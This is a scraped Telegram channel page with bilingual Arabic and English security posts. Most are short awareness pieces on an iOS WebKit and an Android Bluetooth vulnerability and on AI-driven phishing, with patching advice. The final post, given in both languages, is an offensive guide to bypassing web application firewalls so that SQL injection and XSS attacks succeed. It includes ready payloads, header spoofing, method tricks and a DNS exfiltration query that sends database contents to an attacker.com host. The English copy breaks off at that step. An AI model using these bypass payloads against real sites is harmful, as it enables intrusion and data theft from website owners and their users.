SPIDER1CODE
1.9K subscribers
130 photos
22 videos
12 files
81 links
Spider1Code is the first Arab community that brings together cybersecurity artificial intelligence, and more โœจ๐Ÿค
Download Telegram
ู…ุชูŠุฌูˆ ู†ุชูƒู„ู… ุนู† zero day ูู„ ุงูŠููˆู† ๐Ÿ’€


ุงูŠ ูŠุนู… ุณุจุงูŠุฏุฑ ุงู†ุช ุจุชู‚ูˆู„ ุงูŠ ๐Ÿ˜‚

ุทุจ ุงุดุชุฑูŠ ู…ู†ูŠ ู„ุงุฎุฑ ๐Ÿ˜

*ุชุญุฐูŠุฑ ู…ุญุชูˆูŠ ู‚ู†ุงู‡ ู„ู‡ ุญู‚ูˆู‚ ุทุจุน ูˆ ู†ุดุฑ โญ


ู…ูˆุถูˆุนู†ุง ุงู„ู†ู‡ุงุฑุฏู‡ ุนู†

CVE-2025-24201

ุงู„ุซุบุฑู‡ ุฏูŠ ุชุนุชุจุฑ ุฒูŠุฑูˆ ุฏุงูŠ ู„ู†ู‡ุง ูŠูˆู… 14 ู…ุงุฑุณ ๐Ÿ’€

ุงู„ู…ู‡ู… ุงู„ุซุบุฑู‡ ุฏูŠ ุงูƒุชุดููˆู‡ุง ููŠ ู…ุชุตูุญ WebKit

ุงุณุชู†ุงุงุงุง ู…ุด WebKit ุฏุง ุงู„ูŠ ู ุณูุงุฑูŠ ( Safari )

ุงูŠูˆ ูŠุนุฒูŠุฒูŠ ูƒู„ู…ูƒ ุตุญ ุงู†ุช ู…ุนูƒ ุงูŠููˆู† ูˆู„ุง ุงูŠ ุŸ

ุงู„ู…ู‡ู… ู†ูˆุน ุงู„ุซุบุฑู‡ ( Out-of-Bounds Write )

ุงูŠ ุงู„ุซุบุฑู‡ ุฏูŠ ุŸ

ุงู†ุง ู‡ู‚ูˆู„ูƒ ุงู„ุซุบุฑู‡ ุฏูŠ ุจุชุญุตู„ ู„ู…ุง ูƒุชุงุจู‡ ุงู„ุจูŠุงู†ุงุช ููŠ ุงู„ุฐุงูƒุฑู‡ ุงู„ู…ูุฑูˆุถ ุจูŠูƒูˆู† ููŠ ุญุฏูˆุฏ ุงู…ู†ูŠู‡ ุชู…ู†ุน ุงู„ุชุนุฏูŠู„ ุนู„ูŠ ู…ูˆู‚ุน ุบูŠุฑ ู…ุฎุตุตู‡ ู„ูŠู‡ุง ุงู„ุญู‚ูŠู‚ุฉ ู…ุด ู…ูˆุฌูˆุฏู‡ ูˆ ุงู„ุซุบุฑู‡ ุฏูŠ ุจุชูŠุญ ุงู† ูŠุญุตู„ rce ุนู„ูŠ ุงู„ุชู„ููˆู†

ุงู„ุญู…ุฏุงู„ู„ู‡ ุงู†ูŠ ู…ู†ุฒู„ ุชุญุฏูŠุซ ios 18

ู…ุด ุนุงูŠุฒ ุงุตุฏู…ูƒ ูŠุนุฒูŠุฑูŠ ุจุณ ู‡ูŠุง ุจุชุดุชุบู„ ุนู„ูŠ

iOS 18.3.2 ูˆู…ุง ู‚ุจู„ู‡

iPadOS 18.3.2 ูˆู…ุง ู‚ุจู„ู‡

macOS Sequoia 15.3.2 ูˆู…ุง ู‚ุจู„ู‡

Safari 18.3.1 ูˆู…ุง ู‚ุจู„ู‡

visionOS 2.3.2 ูˆู…ุง ู‚ุจู„ู‡

ุทูŠุจ ุงู„ุญู„ ุงูŠ ุŸ

ู†ุฒู„ ุชุญุฏูŠุซ ios ุฌุฏูŠุฏ โœ…

ู†ุฒู„ ุจุฑุงู…ุฌ ุญู…ุงูŠู‡ antivirus โœ…

ุฎู„ูŠ ุจุงู„ูƒ ู…ู† ู…ุญุชูˆูŠ ุงู„ู…ุดุจูˆู‡ โœ…


ู…ุตุฏุฑ ุงู„ุซุบุฑู‡ :

https://nvd.nist.gov/vuln/detail/CVE-2025-24201
โค1๐Ÿ‘Œ1
Letโ€™s Talk About a Zero-Day in iPhone ๐Ÿ’€

Whatโ€™s up, Spider? What are you talking about? ๐Ÿ˜‚

Alright, let me break it down for you. ๐Ÿ˜

๐Ÿšจ Content Warning: This channel holds copyright rights. โญ


---

Today's Topic: CVE-2025-24201

This vulnerability is classified as a zero-day because it was discovered on March 14 ๐Ÿ’€.

The flaw was found in the WebKit browser engine.

Wait a minute... isnโ€™t WebKit the engine used in Safari?

Yes, my friend, you got that right! Do you own an iPhone or what?


---

Whatโ€™s the Type of This Vulnerability?

๐Ÿ“Œ Out-of-Bounds Write

What does that mean? ๐Ÿค”

Well, normally, when writing data to memory, there should be security boundaries that prevent modification of unauthorized memory locations. However, this vulnerability bypasses those boundaries, allowing an attacker to execute Remote Code Execution (RCE) on the target device.


---

Which Devices Are Affected?

The vulnerability affects the following systems:

iOS 18.3.2 and earlier

iPadOS 18.3.2 and earlier

macOS Sequoia 15.3.2 and earlier

Safari 18.3.1 and earlier

visionOS 2.3.2 and earlier



---

How to Protect Yourself?

โœ… Update to the latest iOS version.
โœ… Install antivirus and security software.
โœ… Be cautious of suspicious content and links.


---

Source of the CVE:

https://nvd.nist.gov/vuln/detail/CVE-2025-24201
โค3
ู‚ุงู„ ุฑุณูˆู„ ุงู„ู„ู‡ ุนู„ูŠู‡ ุงู„ุตู„ุงุฉ ูˆุงู„ุณู„ุงู… (ุงุฐุง ู…ุงุช ุงุจู† ุงุฏู… ุงู†ู‚ุทุน ุนู…ู„ู‡ ุงู„ุง ู…ู† ุซู„ุงุซ ุตุฏู‚ุฉ ุฌุงุฑูŠุฉ ุงูˆ ุนู„ู… ูŠู†ุชูุน ุจู‡ ุงูˆ ูˆู„ุฏ ุตุงู„ุญ ูŠุฏุนูˆ ู„ู‡)
โค2
ุจูˆุณุช ุงู„ู†ู‡ุงุฑุฏู‡ ู…ูŠูƒุณ ุจูŠู† ุงู„ุฐูƒุงุก ุงู„ุงุตุทู†ุงุนูŠ ูˆ ุงู„ุณุงูŠุจุฑ ุณูƒูŠูˆุฑุชูŠ ๐Ÿ’€


ุชุญุฐูŠุฑูŠู†

ู„ุงูˆู„ : ุงู„ู‚ู†ุงู‡ ุบูŠุฑ ู…ุณุคูˆู„ู‡ ุนู† ุงู„ุฐูŠ ุณูˆู ูŠุชู… ู…ุง ูŠุชู… ูุนู„ู‡ุง ู…ู† ุงู„ุดุฎุต ุฏุง ู…ู‚ุงู„ ุนู„ู…ูŠ ูˆ ู…ููŠุฏ


ุงู„ุชุงู†ูŠ : ุงู„ู‚ู†ุงู‡ ู„ูŠู‡ุง ุญู‚ูˆู‚ ุทุจุน ูˆ ู†ุดุฑ ุนุงูŠุฒู‡ุง ุชุฏุฎู„ ุชูƒู„ู…ู†ูŠ ุฎุงุต


ู†ุฑุฌุน ู„ ู…ูˆุถูˆุนู†ุง ๐Ÿ˜

ุงู„ูˆู‚ุชูŠ ุจู‚ูŠ ุจูŠุญุตู„ ุงุนู…ุงู„ ุจูŠู† ุงู„ุฐูƒุงุก ุงู„ุงุตุทู†ุงุนูŠ ูˆ ุงู„ุณุงูŠุจุฑ ุณูƒูŠูˆุฑุชูŠ ูˆ ู…ู†ู‡ู… ุงุนู…ุงู„ ููŠุดูŠู†ุฌ

ูˆู‡ ููŠุดูŠู†ุฌ ูŠุณุจุงูŠุฏุฑ ๐Ÿ˜ฑ


ุจุต ูŠุนุฒูŠุฒูŠ ุนุดุงู† ุนุงุฑู ุงู†ุช ุฏู„ูˆู‚ุชูŠ ุจุชู‚ูˆู„ ุงูŠ ุงู„ููŠุดูŠู†ุฌ ุฏุง ุงุฎุชุตุงุฑ ุงู† ุงู„ููŠุดูŠู†ุฌ ุฏุง ุจูŠูƒูˆู† ุตูุญู‡ ู…ุฒูˆุฑู‡ ุจุชูƒุชุจ ุจูŠู‡ุง ุจูŠุงู†ุงุชูƒ ูˆ ุจุชุฑูˆุญ ู„ ุตุงุญุจ ุงู„ุตูุญู‡ ูˆ ุจุชูƒูˆู† ุดุจู‡ ุงู„ู…ูˆู‚ุน ุงู„ุญู‚ูŠู‚ูŠ ุจุธุจุท

ุงู„ู…ู‡ู… ุงู„ูˆู‚ุชูŠ ุจู‚ูŠ ููŠ ู†ุงุณ ููŠ ุงูˆุฑูˆุจุง ุชุญุฏูŠุฏุง ุจูŠุณุชุฎุฏู…ูˆ ai ( ู…ุด ู…ุชุนู„ู…ูŠู† ุจุฑู…ุฌู‡ ) ุนุดุงู† ูŠูƒุชุจ ูƒูˆุฏ ุตูุญู‡ ู…ุฒูˆุฑู‡ ุดุจู‡ Facebook ูˆ ุงู†ุช ุชุฏุฎู„ ุนู„ูŠู‡ุง ูˆ ูุฌุงู‡ ุชู„ู‚ูŠ ุญุณุงุจูƒ ุฑุงุญ ุฏุง ุบูŠุฑ ุงู†ูˆ ุจูŠูƒูˆู† ุนู†ุฏูˆ ุนู†ูˆุงู†ูƒ ( ip ) ูˆ ุนู† ุทุฑูŠู‚ ip ูŠู‚ุฏุฑ ูŠุฌูŠุจูˆ ูˆ ุจุนุฏู‡ุง ุทูˆุฑูˆ ุงู„ู…ูˆุถูˆุน ุจู‚ูˆ ุจูŠุณุชุฎุฏู…ูˆ ุงู„ุฐูƒุงุก ุงู„ุงุตุทู†ุงุนูŠ ุนู„ูŠ ุงุณุงุณ ุงู†ู‡ู… ุญุฏ ู…ู† ุจู†ูƒ ุงูˆ ู†ุฌู… ู…ุดู‡ูˆุฑ ูˆ ูŠูƒู„ู…ูˆูƒ ู…ู† ููŠูƒ ุงูƒูˆู†ุช ุงูˆ ููŠูƒ ู†ู…ุจุฑ ูˆู„ูˆ ูƒู„ู…ูƒ ู…ู† ููŠูƒ ุงูƒูˆู†ุช ูŠุนู…ู„ ููŠุฏูŠูˆ ุนู„ูŠ ุงุณุงุณ ุงู†ูˆ ู†ุฌู… ุฏุง ุงูˆ ุงู„ุดุฎุต ุฏุง ูˆ ููŠูƒ ู†ู…ุจุฑ ุจูŠุบูŠุฑ ุงู„ุตูˆุช ุงู„ู…ูˆุถูˆุน ุฏุง ู‚ุงู„ุจ ุฃูˆุฑูˆุจุง ูƒู„ู‡ุง ู ุฎู„ูŠ ุจุงู„ูƒู… โค๏ธ


ุงู„ุญู„ ุงูŠ ุทูŠุจ ูŠุง ุณุจุงูŠุฏุฑ ๐Ÿ™‚


ุจุต ุงูˆู„ ุญุงุฌู‡

ู…ุด ุชุฑุฏ ุนู„ูŠ ุฑู‚ู… ุบุฑูŠุจ ูŠุนู†ูŠ ู„ูˆ ู„ู‚ูŠุช ุฑู‚ู… ูˆ ุจูŠู‚ูˆู„ูƒ ุงู†ุง ู…ุญู…ุฏ ุฑู…ุถุงู† ูˆ ุจูŠู‚ูˆู„ูƒ ุนู†ูˆุงู†ูƒ ูˆ ุฑู‚ู… ุงู„ููŠุฒู‡ ู‚ูˆู„ูˆ ุงู†ุช ุญู…ุถุงู†

ู…ุด ุชู‚ุจู„ ุงูŠ ุงูƒูˆู†ุช ููŠูƒ ุบูŠุฑ ู„ู…ุง ุชุชุงูƒุฏ ุงู†ูˆ ุดุฎุต ุญู‚ูŠู‚ูŠ

ู…ุด ุชุฑุฏ ุนู„ูŠ ุงูŠ ุฑุณุงู„ู‡ ู…ุฌู‡ูˆู„ู‡ ูู„ sms ุงูˆ ุงู„ูˆุงุชุณ ุงูˆ ุงูˆ

ู…ุด ุชุฏุฎู„ ุนู„ูŠ ู„ูŠู†ูƒุงุช ู…ุดุจูˆู‡ุฉ ูŠุนู†ูŠ ู…ุซู„ุง

www.fecebook.com

ุงู†ุตุญูƒ ุชุดูŠุฑ ุงู„ุจูˆุณุช ูู„ ุฎูŠุฑ ู…ุด ุดุฑุท ูƒุชุงุจู‡ ู…ุญุชูˆูŠ ู†ูุณูˆ ู…ุฌุงู†ูŠ ูˆู„ูƒู† ูƒุชุงุจู‡ ู„ูŠู‡ุง ุงู„ุญู‚ูˆู‚ ุทุจุน ูˆ ุงู„ู†ุดุฑ ุงุชู…ู†ู‡ ุชุฎู„ูŠ ุจุงู„ูƒู… โค๏ธ
โค2
Forwarded from SPIDER SECURITY
โš ๏ธ Two Warnings Before We Start:
1๏ธโƒฃ This channel is not responsible for any misuse of the information provided. This is purely for educational purposes.
2๏ธโƒฃ All rights reserved. If you want to share the content, contact me first.

๐Ÿค– AI & Cybersecurity - Phishing Spider ๐Ÿ•ท๏ธ

Artificial intelligence is now being used in cybercrime, and one of the biggest threats is phishing attacks.

What is phishing?
Phishing is when hackers create fake websites that look exactly like real ones (e.g., Facebook) to steal your login credentials.

Whatโ€™s new?
In Europe, even people with no coding skills are now using AI to generate phishing pages that are almost indistinguishable from the original. If you enter your credentials, your account is gone instantly!

Even worse, scammers now use AI-powered tactics to impersonate banks or celebrities:

Deepfake videos to mimic famous people.

Voice cloning to sound like someone you trust.

Fake numbers to contact victims and gain their trust.


This technique is spreading rapidly in Europe, so be careful!

๐Ÿ›ก๏ธ How to Protect Yourself?

โœ… Do not answer calls from unknown numbers, even if they claim to be a celebrity or a bank official.
โœ… Do not accept friend requests from suspicious accounts without verifying their identity.
โœ… Do not reply to unknown messages via SMS, WhatsApp, or other platforms.
โœ… Do not click on suspicious links, for example:
โŒ www.fecebook.com instead of www.facebook.com

Share this post to raise awareness! Cybersecurity starts with knowledge. โค๏ธ
โค2
ุฒูŠ ู…ุดุฑุญู†ุง ios ุฌู‡ ุฏูˆุฑ ู„ุงู†ุฏุฑูˆูŠุฏ


*ุชุญุฐูŠุฑูŠู†*


ุงู„ุงูˆู„ : ุงู„ู‚ู†ุงู‡ ุบูŠุฑ ู…ุณุคูˆู„ู‡ ุนู† ูุนู„ ู…ุณุชุฎุฏู…

ุงู„ุชุงู†ูŠ : ุงู„ู‚ู†ุงู‡ ู„ูŠู‡ุง ุญู‚ูˆู‚ ุทุจุน ูˆ ู†ุดุฑ


ู†ุฑุฌุน ู„ ู…ูˆุถูˆุนู†ุง ๐Ÿ˜


ุงู„ู†ู‡ุงุฑุฏู‡ ู‡ู†ุชูƒู„ู… ุนู† cve ูุฑูŠุฏ ู…ู† ู†ูˆุนูˆ

ู„ุณู‡ ู†ุงุฒู„ ู…ู† ู‚ุฑูŠุจ ูŠุนุชุจุฑ ูˆ ุฑูƒุฒ ูŠุนุชุจุฑ

ุฒูŠุฑูˆ ุฏุงูŠ cve ุงู„ู†ู‡ุงุฑุฏู‡ ุงุณู…ูˆ

CVE-2025-0074


ุงู„ุชุงุฑูŠุฎ : 2024 ุฏูŠุณู…ุจุฑ ูŠูˆู… 13 ูˆ 2025 ู…ุงุฑุณ ูŠูˆู… 3 ๐Ÿ’€


ุจูŠุนู…ู„ ุงูŠ ุงู„cve ุฏุง ูŠุง ุณุจุงูŠุฏุฑ ๐Ÿ™‚

ุจุต ูŠุนุฒูŠุฒูŠ ุงู„cve ุจูŠุดุชุบู„ ุนู† ุทุฑูŠู‚

ุจู„ูˆุชูˆุซ ุจุฏูˆู† ุฑูƒุฒ ู…ุนุงูŠุง ู ุฏูŠ ู„ุง ุงุฐู† ู…ู†

ู…ุณุชุฎุฏู… ูˆู„ุง ุงุถุงูุงุช ูˆู„ุง ุงู…ุชูŠุงุฒุช

ูŠู†ู‡ุงุฑ ุงุจูŠุถ ูŠุง ุณุจุงูŠุฏุฑ ูŠุนู†ูŠ ุงู†ุง ู…ู…ูƒู†

ุงุดูˆู ุญุฏ ุนู…ู„ cve ุฏุง ุนู„ูŠ ุฌู‡ุงุฒูŠ ูˆ ุงู†ุง ู…ุด ุนุงุฑู ๐Ÿ˜ฑ

ู‡ู‚ูˆู„ูƒ ุงูŠูˆ ูˆ ูƒู…ุงู† ู‡ูŠุนู…ู„ rce ๐Ÿ˜

ุงู„ู„ู‡ ูŠุทู…ู†ูƒ ุทู…ู†ุชู†ูŠ ๐Ÿ™‚

ู†ุฑุฌุน ู„ู…ูˆุถูˆุนู†ุง ุงู„ cve ุจูŠุดุชุบู„ ุนู†

ุทุฑูŠู‚ ู‡ุฌู…ู‡ UAF ( Use-After-Free )

ูˆ ุงู„ู…ุฑู‡ ุฏูŠ ุจุชูŠุญ ุงู† ุงู„ุดุฎุต ูŠูƒุชุจ ูƒูˆุฏ

ุจุฑู…ุฌูŠุงุช ุฎุจูŠุซู‡ ( malware ) ุนู„ูŠ ุฌู‡ุงุฒ

ุงู„ุถุญูŠู‡ ุจุฏูˆู† ุนู„ู… ู…ู†ูˆ ูˆ ุงู„ุซุบุฑู‡ ุชู…

ุชู†ุตูŠูู‡ุง ุงู†ู‡ ุญุฑุฌู‡ ( Critical )

ุทุจ ุงู„ุญู…ุฏุงู„ู„ู‡ ุงู†ุง ุฌู‡ุงุฒูŠ ุงู†ุฏุฑูˆูŠุฏ 14


ูŠุงุงุงุง ูŠุนุฒูŠุฒูŠ ูŠูˆุณูู†ูŠ ุงู‚ูˆู„ูƒ ุงู†ูˆ ุจูŠุจุฏุงุก ู…ู† ุงูˆู„

ุงู†ุฏูˆุฑูŠุฏ 14 ูˆ ุงู†ุฏุฑูˆูŠุฏ 13 ูˆ ุงู†ุฏุฑูˆูŠุฏ 12


ูˆ ุงู†ุฏูˆุฑูŠุฏ 11 ุจุณ ุงู„ุฎุจุฑ ุงู„ุญู„ูˆ ู…ุด


ุจุชุดุชุบู„ ุนู„ูŠ ุงู†ุฏูˆุฑูŠุฏ ู‚ุจู„ 11 ูŠุนู†ูŠ


ุงู†ุฏุฑูˆูŠุฏ 9 ุนุงุฏูŠ ูˆ ุงู‚ู„ ู…ู†ูˆ


ุทูŠุจ ุงู„ุญู„ ุงูŠ ุŸ

ุงู„ุญู„ :

ุชุญุฏุซ ุงุฎุฑ ุงุตุฏุงุฑ ุนู†ุฏูƒ โœ…

ุชู†ุฒู„ antivirus โœ…

ู…ุด ุชุจู‚ูŠ ูุงุชุญ ุจู„ูˆุชูˆุซ ูƒุชูŠุฑ โœ…


ุดูƒุฑุง ุนู„ูŠ ุฏุนู…ูƒู… ู„ูˆู„ุง ุฏุนู…ูƒู… ู„ูŠุง ู…ุด

ุทูˆุฑุช ุงู„ู…ุญุชูˆูŠ ูˆ ุฏุงูŠู…ุง ุจุญุงูˆู„ ุงุทูˆุฑูˆ

ุจุณุจุจ ุฏุนู…ูƒู… ูˆ ุดูƒุฑุง ๐Ÿค


ู…ุตุฏุฑ :


https://www.cve.org/CVERecord?id=CVE-2025-0074

https://vulert.com/vuln-db/CVE-2025-0074


https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0074


https://www.hkcert.org/security-bulletin/android-multiple-vulnerabilities_20250304
โค2
As We Explained iOS, Now It's Android's Turn!

โš ๏ธ Two Warnings:

1. The channel is not responsible for any misuse of this information.


2. All content is copyrighted. Contact us for permissions.




---

๐Ÿ“Œ Todayโ€™s Topic: A Unique CVE!

A recently discovered zero-day vulnerability:

CVE-2025-0074

๐Ÿ“… Date of Discovery: December 13, 2024
๐Ÿ“… Security Patch Released: March 3, 2025 ๐Ÿ’€


---

๐Ÿ”ฅ What Does This CVE Do?

This vulnerability exploits Bluetooth in a completely silent wayโ€”
๐Ÿšซ No user permission required
๐Ÿšซ No additional software needed
๐Ÿšซ No special privileges required

๐Ÿคฏ So, someone can exploit this CVE on my device without me knowing?

โœ” Yes! And it allows Remote Code Execution (RCE). ๐Ÿ˜


---

๐Ÿ› ๏ธ How It Works

The attack is based on a Use-After-Free (UAF) vulnerability,
which allows an attacker to inject and execute malicious code (malware) on the victimโ€™s device without their knowledge.

๐Ÿšจ Severity Level: Critical


---

๐Ÿ“ฑ Affected Devices

Bad news: ๐Ÿ˜ข

Affects Android 11, 12, 13, and 14.


Good news: ๐Ÿ˜ƒ

Does NOT affect Android 9 and lower.



---

โœ… How to Protect Yourself?

1๏ธโƒฃ Update to the latest security patch โœ…
2๏ธโƒฃ Use a trusted antivirus โœ…
3๏ธโƒฃ Keep Bluetooth disabled when not in use โœ…


---

๐Ÿ’ก Thanks for your support! Your engagement helps me improve the content every day. Stay safe! ๐Ÿค


Source :

https://www.cve.org/CVERecord?id=CVE-2025-0074

https://vulert.com/vuln-db/CVE-2025-0074


https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0074


https://www.hkcert.org/security-bulletin/android-multiple-vulnerabilities_20250304
โค2
ุชุนุงู„ูˆ ู†ุชูƒู„ู… ุนู† ู…ูˆุถูˆุน ู…ู‡ู… ุฌุฏุง ูˆ ุงู„ูŠ

ู‡ูˆ ุงุฒุงูŠ ู†ุนู…ู„ bypass ู„ูŠ

waf ( web application firewall )

ุชุญุฐูŠุฑ :

1 : ุงู„ู‚ู†ุงู‡ ุบูŠุฑ ู…ุณุคูˆู„ู‡ ุนู† ุงูŠ ูุนู„ ุฎุงุฑุฌ ู„ุงุทุงุฑ ุงู„ุชุนู„ูŠู…ูŠ

2 : ู…ู…ู†ูˆุน ู†ุดุฑ ุงู„ู…ู‚ุงู„ ุฏูˆู† ุฐูƒุฑ ุงุณู… ุงู„ู‚ุงู„ ูŠูƒู…ู† ู†ุดุฑ ุงู„ู…ุนู„ูˆู…ู‡ ูˆู„ูƒู† ู„ุง ูŠู…ูƒู† ู†ุดุฑ ุงู„ูƒุชุงุจู‡ ุจุญุฏ ุฐุงุชู‡ุง ุงู„ูŠ ุจ ุงุฐู† ู…ู† ุตุงุญุจ ู‚ู†ุงู‡


ู†ูุชุฑุถ ุนู†ุฏู†ุง ุณูŠู†ุงุฑูŠูˆ ู„ ูˆุงุญุฏ ู†ุณู…ูŠ

ุญู…ุงุตู‡ ุญู…ุงุตู‡ ูƒุงู† ู‚ุนุฏ ูŠู‡ู†ุช ูˆู„ู‚ูŠ ุซุบุฑู‡

sql injection

ุดุฑุญ ุณุฑูŠุน : sql injection ุฏูŠ ุจุชุญู‚ู†

ุจุงูŠู„ูˆุฏ ููŠ ุงูƒูˆุงุฏ sql ุจุชุงุน ู…ูˆู‚ุน ุนุดุงู†

ุชุณุญุจ ุฏุงุชุง ุฎุงุตู‡

ุงู„ู…ู‡ู… ุญู…ุงุตู‡ ู„ู…ุง ุฌู‡ ูŠุณุชุบู„ ุซุบุฑู‡ ู…ุนุฑูุด

ู…ุนุฑูุด ูŠุนู…ู„ู‡ุง exploit ุจุณุจุจ waf

ุทูŠุจ ุญู…ุงุตู‡ ูŠุนู…ู„ ุงูŠ ุŸ

ุงู†ุง ู‡ู‚ูˆู„ูƒ โœจ

ุงูˆู„ ุญุงุฌู‡ : ุญู…ุงุตู‡ ูŠุฌุฑุจ ูŠู„ุนุจ ููŠ

ุจุงูŠู„ูˆุฏ ูŠุนู…ู„ encode ุจุฎุชุตุงุฑ

ุทุจ ุฒูŠ ุงูŠ ูŠุง ุณุจุงูŠุฏุฑ ๐Ÿค”

ุฒูŠ ุจุงูŠู„ูˆุฏ xss

<script>alert(1)</script>

ู†ูุณูˆ ุจุนุฏ ู…ุง ุชุนู…ู„ encode url

%22%3E%3CIMG%20sRC=X%20onerror=jaVaScRipT:alertxss%3E

ุจุงูŠู„ูˆุฏ ูˆู‚ุชู‡ุง ุจูŠุดุชุบู„ ุนุงุฏูŠ ูƒู†ูˆ ู†ูุณ ู„ุงูˆู„

ุทูŠุจ ู†ูุฑุถ ู…ุด ุงุดุชุบู„ ๐Ÿค”

ุชุงู†ูŠ ุฎุทูˆู‡ :

ุชู„ุงุนุจ ููŠ headers

ุงูŠ ุงู„ุชู„ุงุนุจ ููŠ ุงู„ู‡ูŠุฏุฑ ุฏูŠ ุŸ

ุดูˆู ุชู„ุงุนุจ ููŠ ุงู„ู‡ูŠุฏุฑ ุจุชูƒูˆู† ุงู†ูƒ ุชุญุงูˆู„

ุชุบูŠุฑ ุญู…ุงูŠู‡ ุฒูŠ X-Original-URL

ุทูŠุจ ุงุฒุงูŠ ๐Ÿค”

ุจุณูŠุทู‡

GET /admin HTTP/1.1
Host: target.com
X-Forwarded-For: 127.0.0.1

ุทูŠุจ ู†ูุฑุถ ุงู†ู‡ุง ู…ุด ุงุดุชุบู„ุช ู†ุนู…ู„ ุงูŠ ุŸ

ู†ูŠุฌูŠ ู„ูŠ ุฎุทูˆู‡ ุชุงู„ุชู‡ :

ู†ุฌุฑุจ ู†ุนุฏู„ ู HTTP ู…ู…ูƒู† ู†ุฎู„ูŠ

TRACE
ูˆ ูŠุดุชุบู„ ู…ุนุงู†ุง

ู…ุซุงู„

HEAD /admin HTTP/1.1
ุงูˆ
TRACE /admin HTTP/1.1

ุจุฏู„ get ุงูˆ post

ุทูŠุจ ู†ูุชุฑุถ ู…ุด ุงุดุชุบู„ุช ๐Ÿค”

ู†ูŠุฌูŠ ู„ูŠ ุทุฑูŠู‚ู‡ ุงู„ุฑุงุจุนู‡ :

ุงู„ุฎุทูˆู‡ ุฏูŠ ุดุจู‡ ุงู„ูŠ ูุงุชุช ูˆู„ูƒู† ุงู†ุช

ู‡ุชุฌุฑุจ ุชุนุฏู„ ุงู„ู…ู„ู ูŠูƒูˆู† ู…ุซู„ุง xml

ู…ุซุงู„ :
/admin.json

ุทูŠุจ ู†ูุชุฑุถ ู…ุด ุงุดุชุบู„ุช ๐Ÿ˜‚๐Ÿค”

ู‡ู‚ูˆู„ูƒ ุจุฑุฏูˆ ููŠ ุฎุทูˆู‡ ุฎุงู…ุณู‡ ๐Ÿ˜‚

ุงู„ุฎุทูˆู‡ ุงู„ุฎุงู…ุณู‡ :

ูˆ ุฏูŠ ุจุณูŠุทู‡ ููŠ waf ุจูŠูƒูˆู† ู…ุด ุนุงุฑู

ูŠูุฑู‚ ุจูŠู† ุงู„ุญุฑูˆู ุงู„ุตุบูŠุฑู‡ ู…ู† ุญุฑูˆู
ุงู„ูƒุจูŠุฑ

ุจุชู‡ุฒุฑ ูŠุง ุณุจุงูŠุฏุฑ ูŠุนู†ูŠ waf ุทู„ุน ุบุจูŠ ูƒุฏ

ู‡ู‚ูˆู„ูƒ ุงูŠูˆ ู…ุซุงู„

<script>alert(1)</script>

ุฏุง ูƒูˆุฏ xss ุนุงุฏูŠ

<Script>alert(1)</Script>

ู‡ูˆ ู†ูุณ ุงู„ูƒูˆุฏ ุจู†ูุณ ุงู„ุทุฑูŠู‚ู‡

ุทูŠุจ ู†ูุชุฑุถ ู…ุด ุงุดุชุบู„ุช ๐Ÿค”

ู‡ู‚ูˆู„ูƒ ููŠ ุทุฑูŠู‚ู‡ ุณุงุฏุณู‡ :


ุงู„ุทุฑูŠู‚ู‡ ุฏูŠ ู…ู…ูƒู† ุชุชู„ุงุนุจ ู dns ุฎุงุต

ุจู„ ู…ูˆู‚ุน

ู…ุซุงู„ :

SELECT LOAD_FILE(CONCAT('\\\\attacker.com\\',database()));

ุฏุง ุจุงูŠู„ูˆุฏ ุนุงุฏูŠ

SELECT * FROM users WHERE id = 1 AND IF(1=1, SLEEP(5), 0);

ุจุนุฏ ุชุนุฏูŠู„

ุทูŠุจ ู„ูˆ ู†ุฌุญุช ุŸ

ุงุฎุฑ ุทุฑูŠู‚ู‡ ูˆ ู‡ูŠุง ุงู„ุณุงุจุนู‡ :

ุดูˆู ุงุตุฏุงุฑ waf ูˆ ุฏูˆุฑ ุนู„ูŠ cve ู„ูŠ

ูˆ ุฌุฑุจ cve ูƒู„ู‡ู… ู„ุญุฏ ู…ุง ุชู‚ุฏุฑ ุชุนู…ู„ bypass

ุดูƒุฑุง ู„ ู‚ุฑุงุฆู‡ ุงู„ู…ู‚ุงู„ ุญุงูˆู„ุช ุงูƒูˆู† ุฎููŠู ูˆ ู…ู„ู… ุจูƒู„ ุดุฆ ๐Ÿค
โค1
Bypassing WAF (Web Application Firewall): A Practical Guide

Disclaimer:

1. This article is for educational purposes only. The author is not responsible for any misuse of the information provided.


2. You may share the knowledge but do not copy this article without permission from the author.




---

Introduction

Let's imagine a scenario where a hacker, whom weโ€™ll call Hamasah, discovers a SQL Injection vulnerability on a target website.

Quick Explanation:

SQL Injection allows attackers to inject malicious SQL queries into an applicationโ€™s database to extract sensitive information.

However, when Hamasah attempts to exploit the vulnerability, the attack gets blocked by a WAF (Web Application Firewall).

So, what should Hamasah do? ๐Ÿค”

Let's explore different WAF bypass techniques step by step.


---

1. Encoding the Payload

One of the simplest ways to bypass a WAF is by encoding the payload so that it doesn't match the WAFโ€™s predefined signatures.

Example: XSS Encoding

Original Payload:

<script>alert(1)</script>

Encoded Payload (URL Encoding):

%22%3E%3CIMG%20sRC=X%20onerror=jaVaScRipT:alertxss%3E


In this case, the WAF might fail to detect the encoded payload while the browser will still interpret and execute it normally.


---

2. Header Manipulation

Some WAFs rely on analyzing request headers to detect malicious traffic. Modifying headers can help bypass them.

Example: Spoofing X-Forwarded-For

Some WAFs only block specific IPs. You can try bypassing it by adding a X-Forwarded-For header to appear as a trusted source.

GET /admin HTTP/1.1
Host: target.com
X-Forwarded-For: 127.0.0.1

If the WAF is improperly configured, it might think the request is coming from the localhost and allow it through.


---

3. HTTP Method Manipulation

Instead of using standard HTTP methods like GET or POST, trying other methods such as HEAD or TRACE might work.

Example:

HEAD /admin HTTP/1.1

or

TRACE /admin HTTP/1.1

Some WAFs do not inspect these methods as strictly as GET/POST.


---

4. Switching to Alternative Data Formats

If the WAF filters traditional form-based requests, try sending data in JSON or XML format instead.

Example:

Instead of:

username=admin' OR 1=1 --

Try sending it as JSON:

{ "username": "admin' OR 1=1 --", "password": "password" }

Some WAFs are not designed to analyze JSON requests properly, which can allow the payload to bypass security.


---

5. Case Manipulation

Many WAFs perform case-sensitive filtering, so modifying the letter case can sometimes bypass them.

Example: XSS Attack Case Manipulation

Normal Payload:

<script>alert(1)</script>

Bypass Attempt:

<Script>alert(1)</Script>


If the WAF only blocks lowercase "script", the uppercase version might go through.


---

6. Exploiting DNS-based Exfiltration

Some WAFs block direct responses but still allow outbound connections, which can be used to extract data.

Example:

Instead of trying to display sensitive data on the screen, you can send it to an external server via DNS requests:

